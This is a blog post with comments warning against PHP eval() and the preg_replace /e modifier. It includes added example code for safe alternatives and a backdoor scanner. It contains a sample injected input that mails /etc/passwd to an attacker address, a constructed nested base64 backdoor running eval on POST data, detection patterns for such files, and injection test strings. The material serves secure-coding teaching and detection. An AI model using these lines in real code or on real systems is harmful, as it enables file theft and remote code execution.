JSON creator Douglas Crockford has pointed out more than once that in JavaScript, eval is evil. Well, in PHP eval is also almost always evil (though some people say it can be useful in a few limited cases). I personally don't have the guts to use it. Allowing any user-supplied data to reach an eval( ) call is asking to be hacked.
eval( ) also has relatives. Don't use the /e modifier with preg_replace( ): with /e, preg_replace( ) runs the replacement string through eval( ) after splicing in whatever the pattern captured from the subject, so user-entered data in such a call ends up inside PHP code before it runs. (The /e modifier was deprecated in PHP 5.5 and removed in PHP 7.0; preg_replace_callback( ) is the replacement.)
So what does eval do? eval( string $code ) evaluates the string given in $code as PHP code. Imagine a login form that handles the username field with eval($_POST['username']). The hacker simply types PHP into that field, for example: mail("hacker@somewhere.com", "Loot", file_get_contents("/etc/passwd")); and your server mails them the file. /etc/passwd only lists account names (the password hashes live in /etc/shadow, which the web server user normally cannot read), but the same trick fetches anything that user can read, your config file with the database credentials included, and every function PHP exposes, shell commands among them, is now the attacker's to call.
So don't use eval unless you are suicidal. ;)
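To make the point concrete, here is an added example (not code from the original post) that puts the eval( ) misuse described above next to an eval( )-free version. The request array and the attacker's input are constructed so the script runs offline; the vulnerable function is defined but deliberately never called, and the function and field names are illustrative.

```php
<?php
// Added example for this post (not code from the original). It puts the eval()
// misuse described above next to an eval()-free version. The request array is
// constructed so the script runs offline; the vulnerable function is defined but
// deliberately never called.

// What an attacker would type into the "username" field (constructed sample).
$evilInput = 'mail("hacker@somewhere.com", "Loot", file_get_contents("/etc/passwd"));';

// --- Vulnerable: the submitted string *is* the program ----------------------
function vulnerableLogin(array $post): void
{
    eval($post['username']);   // runs as the web server user. DO NOT DO THIS.
}

// The preg_replace() /e modifier had the same problem: the replacement string,
// with captured back-references spliced in, was passed to eval(). It was
// removed in PHP 7.0, so it is shown only as a comment here:
//   preg_replace('/\{(\w+)\}/e', 'lookup("$1")', $userText);

// --- Hardened: the username is data, validated by shape and never evaluated --
function safeLogin(array $post): string
{
    $username = $post['username'] ?? '';
    if (!preg_match('/^[a-z][a-z0-9_]{2,31}$/', $username)) {
        throw new InvalidArgumentException('invalid username');
    }
    return $username;   // safe to use as a lookup key, log field, etc.
}

// --- Hardened replacement for /e: the callback is real code, the match is data
function expandPlaceholders(string $tpl, array $vars): string
{
    return preg_replace_callback('/\{(\w+)\}/', function (array $m) use ($vars): string {
        return isset($vars[$m[1]]) ? (string) $vars[$m[1]] : $m[0];
    }, $tpl);
}

$post = ['username' => $evilInput];
try {
    safeLogin($post);
} catch (InvalidArgumentException $e) {
    echo "rejected: ", $e->getMessage(), "\n";
}
// The payload comes back as inert text, not as an executed mail() call.
echo expandPlaceholders('Hello {name}!', ['name' => $evilInput]), "\n";
```

The difference is not the amount of validation but where the user's bytes can end up: in safeLogin( ) and expandPlaceholders( ) they are only ever compared, looked up or printed, so there is no code path on which they could be parsed as PHP.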



I find eval very helpful in variable-setting examples, for example:
eval('$this->debug =' . (IS_PHP4 ? '&' : '') . ' new stdClass();');
The only cases where eval is "evil" are where you're inputting user data into eval, but you should be validating and sanitising any user input anyway.
Hi Ross,
In your case it provides convenience and is really helpful. What I mentioned in my post was more about the possible problems eval causes.
Really appreciate your opinion. :)
In your first paragraph you’re assuming that any use of eval() is evil? You say that allowing any user-supplied data to go into eval() is asking to be hacked; that’s not the same thing as just using eval().
I was using eval() today (though, admittedly, I am strongly against eval() too) but none of the data in it is user-supplied.
“if the hacker type the following value in the input field”
he gets nothing with your example except an email with '/bin/cat /etc/passwd' as text.
I too use eval() and find it is a very useful and powerful function.
It’s only ‘evil’ to the idiots who don’t use correct input validation and allow any content to be eval()’d.
If you design your product right, you shouldn't have any problems. Avoiding eval, for me, just isn't a solution.
Also, max is right.
Max is right, and I agree with Rob.
Even if they did get the contents of your passwd file, it actually only contains information on users, like id, username and group. No passwords; the passwords are in the shadow file…
You just have to always escape the eval statement.
eval("echo \$variable;");
You can also use eval to return some reference or value:
$result_variable = eval("return \$static" . $dynamic . ";");
Eval can be a useful function, however it can also be an open invitation for malicious code. In most cases, eval can and should be avoided, especially when validating user-inputted data.
Eval, imho, is best used as a limited method for interpreting templated data (i.e. Smarty), but again, any time you give users the power of the programmer, bad things can happen.
Just a word of caution to all my fellow programmers… no one writes code using eval with the idea that it can be manipulated… so just be very careful how you use it.
- Mike :o)
/etc/passwd is useless anyways.
eval() is used in php frameworks.
Specifically, it can be used in declaring dynamic variables.
ex.
$varname = "myvar";
eval("\${$varname} = 12345;"); // sets $myvar to 12345
I mostly use eval to help with obfuscation…
I know it doesn't really help with obfuscation, but I've made a program which nests eval inside eval inside eval with some string "encryptions" which differ randomly, to help keep skids and possible paying customers (LOL) away from my source code (of course assuming I sold them the system without rights to the source).
It can be broken, but it really helps cut down on piracy. There is some server time going into decoding each time but for some scripts a few milliseconds doesn’t matter.
Pingback: How do I execute PHP that is stored in a MySQL database? - Programmers Goodies
Even if they DID obtain the contents of /etc/passwd, it's not like it'd matter. /etc/shadow is what they would really want, and you'd have to run your PHP script as root or as a user in the shadow group. Which, my friends, is purely suicidal.
There are many cases where you can write code to prevent the use of eval().
Have you tried:
$$varname = 12345;
Look up variable variables. They work wonders.
I must say, you should NEVER couple your code so tightly that you need to eval() it.
Try this, it not only adds structure, but allows you to keep separate codebases.
if(IS_PHP4) include 'php4_codebase.php';
else include 'php5_codebase.php';
99% of cases that you’d need to use eval() you can avoid with a little bit of logic and a quick dose of documentation.
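As an added example (not code posted by any commenter), here are the three eval( ) patterns posted above rewritten without eval( ): the dynamically named variable, the dynamically named object property (the $this->debug case), and the "return \$static" . $dynamic lookup. The class, property and key names are illustrative, and the allow-list shows the check that still matters once the name is no longer evaluated as code.

```php
<?php
// Added example for this thread (not code posted by any commenter). It rewrites
// the eval() patterns posted above without eval(): a dynamically named variable,
// a dynamically named object property, and a "return $static.$dynamic" lookup.
// Class, property and key names are illustrative.

class Config
{
    public $debug;
    public $verbose;
}

// 1. eval("\${$varname} = 12345;") becomes a variable variable. Note that if
//    $varname were user-controlled it could still clobber locals (e.g. 'varname'
//    itself), so the name should come from your own code or an allow-list.
function setDynamicVar(string $varname): array
{
    $$varname = 12345;          // creates $myvar in this scope
    return get_defined_vars();  // shows exactly what was created
}

// 2. eval('$this->debug = new stdClass();') becomes $obj->$prop, with an
//    allow-list so an unexpected name cannot add arbitrary properties.
function setDynamicProp(Config $cfg, string $prop): Config
{
    $allowed = ['debug', 'verbose'];
    if (!in_array($prop, $allowed, true)) {
        throw new InvalidArgumentException("unknown property: $prop");
    }
    $cfg->$prop = new stdClass();
    return $cfg;
}

// 3. eval("return \$static" . $dynamic . ";") becomes an array lookup keyed by
//    the dynamic part. A bad key is a missing entry, never a parse error or code.
function lookupDynamic(string $dynamic): ?string
{
    $static = ['_a' => 'alpha', '_b' => 'beta'];   // constructed data
    return $static[$dynamic] ?? null;
}

print_r(setDynamicVar('myvar'));                        // [varname => myvar, myvar => 12345]
var_dump(setDynamicProp(new Config(), 'debug')->debug instanceof stdClass); // bool(true)
var_dump(lookupDynamic('_b'));                          // string(4) "beta"
var_dump(lookupDynamic('; system("id"); //'));          // NULL: just an absent key
```

The last call is the whole argument in one line: fed the same string, the eval( ) version from the thread would have tried to parse it as PHP, while the lookup simply has no such key.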
On my website, in /public_html/, I found an extra PHP file named a.php,
and I opened this a.php in Dreamweaver; it shows
Can someone tell me what this means?
My website was redirected to another website that does not belong to me.
How can I prevent this?
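The file described in the comment above is the flip side of the "nested eval by eval by eval with string encryption" approach mentioned earlier in the thread: an unexpected .php in the web root that eval( )s an encoded blob or redirects visitors is how injected PHP usually looks. As an added example (not code from the post or any commenter), here is a small indicator scanner that flags those patterns and peels nested base64 layers so the innermost eval( ) is seen too. The sample files are constructed for the demo, and the indicator names are ours.

```php
<?php
// Added example for this comment thread (not code from the post or any commenter).
// A small indicator scanner for the kind of file described above: an unexpected
// .php dropped into a web root that uses eval() on an encoded blob or redirects
// visitors elsewhere. The samples at the bottom are constructed for the demo.

const MAX_LAYERS = 5;

function scanPhpSource(string $src, int $layer = 0): array
{
    $hits = [];
    $prefix = $layer ? "layer $layer: " : '';
    $patterns = [
        'eval-of-decoder'   => '/\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13|strrev)\s*\(/i',
        'eval-of-request'   => '/\beval\s*\([^;]*\$_(?:GET|POST|REQUEST|COOKIE)\b/i',
        'external-redirect' => '/\bheader\s*\(\s*[\'"]Location:\s*https?:\/\//i',
        'long-encoded-blob' => '/[A-Za-z0-9+\/=]{200,}/',
    ];
    foreach ($patterns as $name => $re) {
        if (preg_match($re, $src)) {
            $hits[] = $prefix . $name;
        }
    }

    // preg_replace() with the /e modifier: the first argument is a string literal
    // whose modifier letters (after the last delimiter) contain "e". Bracket-style
    // delimiters such as (...) or {...} are not handled here.
    if (preg_match_all('/\bpreg_replace\s*\(\s*([\'"])(.*?)\1/s', $src, $m)) {
        foreach ($m[2] as $pattern) {
            $delim = $pattern === '' ? '' : $pattern[0];
            $end   = $delim === '' ? false : strrpos($pattern, $delim, 1);
            if ($end !== false && strpos(substr($pattern, $end + 1), 'e') !== false) {
                $hits[] = $prefix . 'preg_replace-e-modifier';
            }
        }
    }

    // Peel one base64 layer and rescan: these files nest eval(decode(...)) several deep.
    if ($layer < MAX_LAYERS
        && preg_match('/base64_decode\s*\(\s*[\'"]([A-Za-z0-9+\/=]+)[\'"]\s*\)/', $src, $b)) {
        $inner = base64_decode($b[1], true);
        if ($inner !== false) {
            $hits = array_merge($hits, scanPhpSource($inner, $layer + 1));
        }
    }
    return $hits;
}

// Constructed samples. a.php imitates a dropped backdoor with two eval() layers
// wrapped around a one-line request-to-eval shell; the blobs are built at runtime.
$innermost = 'eval($_POST["c"]);';
$middle    = 'eval(base64_decode("' . base64_encode($innermost) . '"));';
$samples = [
    'a.php'      => '<?php eval(base64_decode("' . base64_encode($middle) . '"));',
    'redir.php'  => '<?php header("Location: http://example.invalid/"); exit;',
    'legacy.php' => '<?php echo preg_replace("/x/e", "strtoupper(\'$0\')", $s);',
    'index.php'  => '<?php echo preg_replace_callback("/x/", fn($m) => strtoupper($m[0]), $s);',
];
foreach ($samples as $file => $src) {
    $hits = scanPhpSource($src);
    printf("%-11s %s\n", $file, $hits ? implode(', ', $hits) : 'clean');
}
```

Run against the samples, a.php reports eval-of-decoder at the outer layer, eval-of-decoder again one layer in and eval-of-request at the innermost layer, redir.php reports the external redirect, legacy.php the /e modifier, and index.php is clean. Indicators like these are a triage aid, not proof: an obfuscated file can hide its decoder behind string concatenation, so the unexpected file's timestamp, owner and the access log around its creation still need a look.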
Use eval only if you have a specific purpose, but don't abuse it. There are many ways you can do without eval, because eval gives other programmers a way to modify your system externally without your intending it. Putting eval in your code is giving your system a backdoor.
[quote]
because eval gives other programmers a way to modify your system externally without your intending it. Putting eval in your code is giving your system a backdoor.
[/quote]
Nonsense.
If you properly design your code, then there should be no problem with using eval at all.
Just make sure that you know exactly what is going into eval.
Eval can be very helpful if you have very dynamic systems, and it enables you as a programmer to write very compact code that would otherwise need very complex structures.
Had to chime in here, been researching the use of eval() for a dynamic solution in eCommerce. We want to give additional functionality to our customers (store owners), allowing them to configure their own rules for handling distribution, i.e. order > 70 do x, order < 50 do y, etc.
A valid use of eval() (if done correctly).
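The store-owner rule case above is the one in the thread where eval( ) looks most tempting, and also the one where the person typing the rule is not the programmer. As an added example (not the commenter's code), here is the "order > 70 do x" idea implemented as data: the rule text is parsed into a field, an operator, a number and an action, each checked against an allow-list, and the comparison is performed by ordinary code. The field names, action names and rule syntax are illustrative.

```php
<?php
// Added example for the comment above (not the commenter's own code). It
// implements "order > 70 do x" style store-owner rules without eval(): the rule
// text is parsed into data, and only allow-listed fields, operators and actions
// are ever acted on. Field and action names are illustrative.

final class RuleEngine
{
    private const FIELDS  = ['total', 'item_count', 'weight_kg'];
    private const OPS     = ['>', '>=', '<', '<=', '=='];
    private const ACTIONS = ['free_shipping', 'express_courier', 'hold_for_review'];

    /** Parse "total > 70 => free_shipping" into a checked array, or throw. */
    public static function parse(string $text): array
    {
        if (!preg_match('/^\s*(\w+)\s*(>=|<=|==|>|<)\s*(-?\d+(?:\.\d+)?)\s*=>\s*(\w+)\s*$/', $text, $m)) {
            throw new InvalidArgumentException("unparseable rule: $text");
        }
        [, $field, $op, $value, $action] = $m;
        if (!in_array($field, self::FIELDS, true)) {
            throw new InvalidArgumentException("unknown field: $field");
        }
        if (!in_array($op, self::OPS, true)) {
            throw new InvalidArgumentException("unknown operator: $op");
        }
        if (!in_array($action, self::ACTIONS, true)) {
            throw new InvalidArgumentException("unknown action: $action");
        }
        return ['field' => $field, 'op' => $op, 'value' => (float) $value, 'action' => $action];
    }

    /** Evaluate one parsed rule against an order; the comparison is code we wrote, not eval(). */
    public static function matches(array $rule, array $order): bool
    {
        $lhs = (float) ($order[$rule['field']] ?? 0);
        switch ($rule['op']) {
            case '>':  return $lhs >  $rule['value'];
            case '>=': return $lhs >= $rule['value'];
            case '<':  return $lhs <  $rule['value'];
            case '<=': return $lhs <= $rule['value'];
            default:   return $lhs == $rule['value'];
        }
    }

    /** Return the actions fired by a list of rule strings for one order. */
    public static function actionsFor(array $ruleTexts, array $order): array
    {
        $fired = [];
        foreach ($ruleTexts as $text) {
            $rule = self::parse($text);
            if (self::matches($rule, $order)) {
                $fired[] = $rule['action'];
            }
        }
        return $fired;
    }
}

// Constructed store rules and a constructed order.
$rules = [
    'total > 70 => free_shipping',
    'item_count < 50 => express_courier',
    'weight_kg >= 30 => hold_for_review',
];
$order = ['total' => 120.0, 'item_count' => 3, 'weight_kg' => 4.5];
print_r(RuleEngine::actionsFor($rules, $order));   // free_shipping, express_courier

// A "rule" that smuggles in code is rejected at parse time instead of executed.
try {
    RuleEngine::parse('total > 70 => system("id")');
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), "\n";
}
```

Growing this means adding entries to the allow-lists or extending the grammar, which is more typing than eval($rule), but it keeps the store owner's text from ever being a program: a bad rule is an exception with a readable message, not a PHP parse error or a shell command running as the web server.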